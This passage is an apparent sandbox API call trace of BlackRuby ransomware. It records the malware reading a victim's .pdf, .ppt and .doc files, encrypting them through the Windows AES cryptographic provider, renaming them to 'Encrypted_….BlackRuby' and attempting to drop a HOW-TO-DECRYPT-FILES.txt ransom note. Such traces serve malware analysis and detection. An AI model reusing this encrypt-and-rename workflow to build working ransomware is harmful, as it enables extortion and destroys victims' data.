lpFileSizeHigh=0x18ed70*=0x0) returned 0x18f1a [0051.559] GetLastError () returned 0x0 [0051.559] ReadFile (in: hFile=0x184, lpBuffer=0x2c91280, nNumberOfBytesToRead=0x18f1a, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2c91280*, lpNumberOfBytesRead=0x18ed18*=0x18f1a, lpOverlapped=0x0) returned 1 [0051.561] GetLastError () returned 0x0 [0051.561] CloseHandle (hObject=0x184) returned 1 [0051.561] GetLastError () returned 0x0 [0051.562] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.562] GetLastError () returned 0x0 [0051.562] SetErrorMode (uMode=0x1) returned 0x0 [0051.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8283d30, ftCreationTime.dwHighDateTime=0x1d354a3, ftLastAccessTime.dwLowDateTime=0x152809e0, ftLastAccessTime.dwHighDateTime=0x1d35969, ftLastWriteTime.dwLowDateTime=0x152809e0, ftLastWriteTime.dwHighDateTime=0x1d35969, nFileSizeHigh=0x0, nFileSizeLow=0x18f1a)) returned 1 [0051.562] GetLastError () returned 0x0 [0051.562] SetErrorMode (uMode=0x0) returned 0x1 [0051.562] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0051.562] GetLastError () returned 0x0 [0051.596] CryptImportKey (in: hProv=0x37c790, pbData=0x1c701b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0051.596] GetLastError () returned 0x0 [0051.596] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.596] GetLastError () returned 0x0 [0051.601] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.601] GetLastError () returned 0x0 [0051.601] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f20) returned 1 [0051.601] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.601] GetLastError () returned 0x0 [0051.601] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c9d1fc*=0x1, dwFlags=0x0) returned 1 [0051.601] GetLastError () returned 0x0 [0051.601] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c9d1c8, dwFlags=0x0) returned 1 [0051.601] GetLastError () returned 0x0 [0051.602] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cc31f0*, pdwDataLen=0x18ed08*=0x19010, dwBufLen=0x19010 | out: pbData=0x2cc31f0*, pdwDataLen=0x18ed08*=0x19010) returned 1 [0051.603] GetLastError () returned 0x0 [0051.604] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c9d258*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c9d258*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.604] GetLastError () returned 0x0 [0051.604] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c9d288*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c9d288*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.604] GetLastError () returned 0x0 [0051.607] CryptDestroyKey (hKey=0x360ea0) returned 1 [0051.607] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.607] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.607] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.607] GetLastError () returned 0x0 [0051.607] SetErrorMode (uMode=0x1) returned 0x0 [0051.607] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.608] GetLastError () returned 0xb7 [0051.608] GetFileType (hFile=0x184) returned 0x1 [0051.608] SetErrorMode (uMode=0x0) returned 0x1 [0051.608] GetFileType (hFile=0x184) returned 0x1 [0051.611] CloseHandle (hObject=0x184) returned 1 [0051.611] GetLastError () returned 0xb7 [0051.611] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.611] GetLastError () returned 0xb7 [0051.611] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_O1yZ7ssANUBPAEGTSmM0LCsiQTaHcrDrPRuvVMv.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_O1yZ7ssANUBPAEGTSmM0LCsiQTaHcrDrPRuvVMv.BlackRuby", lpFilePart=0x0) returned 0x5c [0051.611] GetLastError () returned 0xb7 [0051.611] SetErrorMode (uMode=0x1) returned 0x0 [0051.611] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8283d30, ftCreationTime.dwHighDateTime=0x1d354a3, ftLastAccessTime.dwLowDateTime=0x152809e0, ftLastAccessTime.dwHighDateTime=0x1d35969, ftLastWriteTime.dwLowDateTime=0x26f7d740, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x19020)) returned 1 [0051.611] GetLastError () returned 0xb7 [0051.611] SetErrorMode (uMode=0x0) returned 0x1 [0051.611] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_O1yZ7ssANUBPAEGTSmM0LCsiQTaHcrDrPRuvVMv.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_o1yz7ssanubpaegtsmm0lcsiqtahcrdrpruvvmv.blackruby")) returned 1 [0051.612] GetLastError () returned 0xb7 [0051.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.612] GetLastError () returned 0xb7 [0051.612] SetErrorMode (uMode=0x1) returned 0x0 [0051.612] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.612] GetLastError () returned 0x5 [0051.613] SetErrorMode (uMode=0x0) returned 0x1 [0051.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.613] GetLastError () returned 0x5 [0051.613] SetErrorMode (uMode=0x1) returned 0x0 [0051.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vsoiz.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1cba584 | out: lpFileInformation=0x1cba584*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69f5eee0, ftCreationTime.dwHighDateTime=0x1d34cf5, ftLastAccessTime.dwLowDateTime=0xcc77ba10, ftLastAccessTime.dwHighDateTime=0x1d3589b, ftLastWriteTime.dwLowDateTime=0xcc77ba10, ftLastWriteTime.dwHighDateTime=0x1d3589b, nFileSizeHigh=0x0, nFileSizeLow=0x4c27)) returned 1 [0051.613] GetLastError () returned 0x5 [0051.613] SetErrorMode (uMode=0x0) returned 0x1 [0051.614] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.614] GetLastError () returned 0x5 [0051.614] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.614] GetLastError () returned 0x5 [0051.614] SetErrorMode (uMode=0x1) returned 0x0 [0051.614] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vsoiz.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.614] GetLastError () returned 0x0 [0051.614] GetFileType (hFile=0x184) returned 0x1 [0051.614] SetErrorMode (uMode=0x0) returned 0x1 [0051.614] GetFileType (hFile=0x184) returned 0x1 [0051.614] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x4c27 [0051.614] GetLastError () returned 0x0 [0051.614] ReadFile (in: hFile=0x184, lpBuffer=0x1cbc3ac, nNumberOfBytesToRead=0x4c27, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cbc3ac*, lpNumberOfBytesRead=0x18ed18*=0x4c27, lpOverlapped=0x0) returned 1 [0051.615] GetLastError () returned 0x0 [0051.615] CloseHandle (hObject=0x184) returned 1 [0051.615] GetLastError () returned 0x0 [0051.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.615] GetLastError () returned 0x0 [0051.615] SetErrorMode (uMode=0x1) returned 0x0 [0051.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vsoiz.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69f5eee0, ftCreationTime.dwHighDateTime=0x1d34cf5, ftLastAccessTime.dwLowDateTime=0xcc77ba10, ftLastAccessTime.dwHighDateTime=0x1d3589b, ftLastWriteTime.dwLowDateTime=0xcc77ba10, ftLastWriteTime.dwHighDateTime=0x1d3589b, nFileSizeHigh=0x0, nFileSizeLow=0x4c27)) returned 1 [0051.615] GetLastError () returned 0x0 [0051.615] SetErrorMode (uMode=0x0) returned 0x1 [0051.650] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1d1ff98, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0051.650] GetLastError () returned 0x0 [0051.650] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.650] GetLastError () returned 0x0 [0051.655] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.655] GetLastError () returned 0x0 [0051.655] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0051.655] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.656] GetLastError () returned 0x0 [0051.656] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1d4cfe4*=0x1, dwFlags=0x0) returned 1 [0051.656] GetLastError () returned 0x0 [0051.656] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1d4cfb0, dwFlags=0x0) returned 1 [0051.656] GetLastError () returned 0x0 [0051.656] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4d02c*, pdwDataLen=0x18ed08*=0x4d20, dwBufLen=0x4d20 | out: pbData=0x1d4d02c*, pdwDataLen=0x18ed08*=0x4d20) returned 1 [0051.656] GetLastError () returned 0x0 [0051.659] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5c3d4*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b5c3d4*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.659] GetLastError () returned 0x0 [0051.659] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b5c404*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b5c404*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.659] GetLastError () returned 0x0 [0051.659] CryptDestroyKey (hKey=0x360b60) returned 1 [0051.659] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.659] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.659] GetLastError () returned 0x0 [0051.659] SetErrorMode (uMode=0x1) returned 0x0 [0051.661] GetFileType (hFile=0x184) returned 0x1 [0051.661] SetErrorMode (uMode=0x0) returned 0x1 [0051.661] GetFileType (hFile=0x184) returned 0x1 [0051.663] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt", lpFilePart=0x0) returned 0x2a [0051.663] GetLastError () returned 0xb7 [0051.663] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_aLDYIeypEAa2QdzXtSNOYgXmJm1PYkYny6bHky9g5643.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_aLDYIeypEAa2QdzXtSNOYgXmJm1PYkYny6bHky9g5643.BlackRuby", lpFilePart=0x0) returned 0x61 [0051.663] GetLastError () returned 0xb7 [0051.663] SetErrorMode (uMode=0x1) returned 0x0 [0051.663] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vsoiz.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69f5eee0, ftCreationTime.dwHighDateTime=0x1d34cf5, ftLastAccessTime.dwLowDateTime=0xcc77ba10, ftLastAccessTime.dwHighDateTime=0x1d3589b, ftLastWriteTime.dwLowDateTime=0x26fefb60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4d30)) returned 1 [0051.663] GetLastError () returned 0xb7 [0051.663] SetErrorMode (uMode=0x0) returned 0x1 [0051.663] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vsOIz.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vsoiz.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_aLDYIeypEAa2QdzXtSNOYgXmJm1PYkYny6bHky9g5643.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_aldyieypeaa2qdzxtsnoygxmjm1pykyny6bhky9g5643.blackruby")) returned 1 [0051.663] GetLastError () returned 0xb7 [0051.664] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.664] GetLastError () returned 0xb7 [0051.664] SetErrorMode (uMode=0x1) returned 0x0 [0051.664] SetErrorMode (uMode=0x0) returned 0x1 [0051.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.665] GetLastError () returned 0x5 [0051.665] SetErrorMode (uMode=0x1) returned 0x0 [0051.665] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wckiecy_7jg3kqai_c3f.doc"), fInfoLevelId=0x0, lpFileInformation=0x1b87e38 | out: lpFileInformation=0x1b87e38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf3e643a0, ftCreationTime.dwHighDateTime=0x1d34cfc, ftLastAccessTime.dwLowDateTime=0xbb8fc3f0, ftLastAccessTime.dwHighDateTime=0x1d34e14, ftLastWriteTime.dwLowDateTime=0xbb8fc3f0, ftLastWriteTime.dwHighDateTime=0x1d34e14, nFileSizeHigh=0x0, nFileSizeLow=0x55c1)) returned 1 [0051.665] GetLastError () returned 0x5 [0051.665] SetErrorMode (uMode=0x0) returned 0x1 [0051.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.665] GetLastError () returned 0x5 [0051.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.665] GetLastError () returned 0x5 [0051.665] SetErrorMode (uMode=0x1) returned 0x0 [0051.665] GetFileType (hFile=0x184) returned 0x1 [0051.665] SetErrorMode (uMode=0x0) returned 0x1 [0051.665] GetFileType (hFile=0x184) returned 0x1 [0051.665] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x55c1 [0051.665] GetLastError () returned 0x0 [0051.665] ReadFile (in: hFile=0x184, lpBuffer=0x1b89c64, nNumberOfBytesToRead=0x55c1, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b89c64*, lpNumberOfBytesRead=0x18ed18*=0x55c1, lpOverlapped=0x0) returned 1 [0051.666] GetLastError () returned 0x0 [0051.666] CloseHandle (hObject=0x184) returned 1 [0051.666] GetLastError () returned 0x0 [0051.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.666] GetLastError () returned 0x0 [0051.666] SetErrorMode (uMode=0x1) returned 0x0 [0051.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wckiecy_7jg3kqai_c3f.doc"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf3e643a0, ftCreationTime.dwHighDateTime=0x1d34cfc, ftLastAccessTime.dwLowDateTime=0xbb8fc3f0, ftLastAccessTime.dwHighDateTime=0x1d34e14, ftLastWriteTime.dwLowDateTime=0xbb8fc3f0, ftLastWriteTime.dwHighDateTime=0x1d34e14, nFileSizeHigh=0x0, nFileSizeLow=0x55c1)) returned 1 [0051.666] GetLastError () returned 0x0 [0051.667] SetErrorMode (uMode=0x0) returned 0x1 [0051.667] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0051.667] GetLastError () returned 0x0 [0051.705] CryptImportKey (in: hProv=0x37c790, pbData=0x1beebcc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0051.705] GetLastError () returned 0x0 [0051.705] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.705] GetLastError () returned 0x0 [0051.710] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.710] GetLastError () returned 0x0 [0051.710] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0051.710] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.710] GetLastError () returned 0x0 [0051.710] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c1bc18*=0x1, dwFlags=0x0) returned 1 [0051.710] GetLastError () returned 0x0 [0051.710] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c1bbe4, dwFlags=0x0) returned 1 [0051.710] GetLastError () returned 0x0 [0051.710] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1bc60*, pdwDataLen=0x18ed08*=0x56c0, dwBufLen=0x56c0 | out: pbData=0x1c1bc60*, pdwDataLen=0x18ed08*=0x56c0) returned 1 [0051.711] GetLastError () returned 0x0 [0051.711] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c26a0c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c26a0c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.711] GetLastError () returned 0x0 [0051.711] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c26a3c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c26a3c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.711] GetLastError () returned 0x0 [0051.711] CryptDestroyKey (hKey=0x360ea0) returned 1 [0051.711] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.711] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.711] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.711] GetLastError () returned 0x0 [0051.711] SetErrorMode (uMode=0x1) returned 0x0 [0051.711] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wckiecy_7jg3kqai_c3f.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.712] GetLastError () returned 0xb7 [0051.712] GetFileType (hFile=0x184) returned 0x1 [0051.712] SetErrorMode (uMode=0x0) returned 0x1 [0051.712] GetFileType (hFile=0x184) returned 0x1 [0051.713] CloseHandle (hObject=0x184) returned 1 [0051.713] GetLastError () returned 0xb7 [0051.713] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc", lpFilePart=0x0) returned 0x39 [0051.713] GetLastError () returned 0xb7 [0051.713] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_NCFmMiYeZnHLsXLI3iZd6cxOXB9OP7vh0VdDm2o.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_NCFmMiYeZnHLsXLI3iZd6cxOXB9OP7vh0VdDm2o.BlackRuby", lpFilePart=0x0) returned 0x5c [0051.713] GetLastError () returned 0xb7 [0051.713] SetErrorMode (uMode=0x1) returned 0x0 [0051.713] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wckiecy_7jg3kqai_c3f.doc"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf3e643a0, ftCreationTime.dwHighDateTime=0x1d34cfc, ftLastAccessTime.dwLowDateTime=0xbb8fc3f0, ftLastAccessTime.dwHighDateTime=0x1d34e14, ftLastWriteTime.dwLowDateTime=0x27061f80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x56d0)) returned 1 [0051.713] GetLastError () returned 0xb7 [0051.713] SetErrorMode (uMode=0x0) returned 0x1 [0051.713] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\WCkiEcY_7jg3kqAi_c3f.doc" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\wckiecy_7jg3kqai_c3f.doc"), 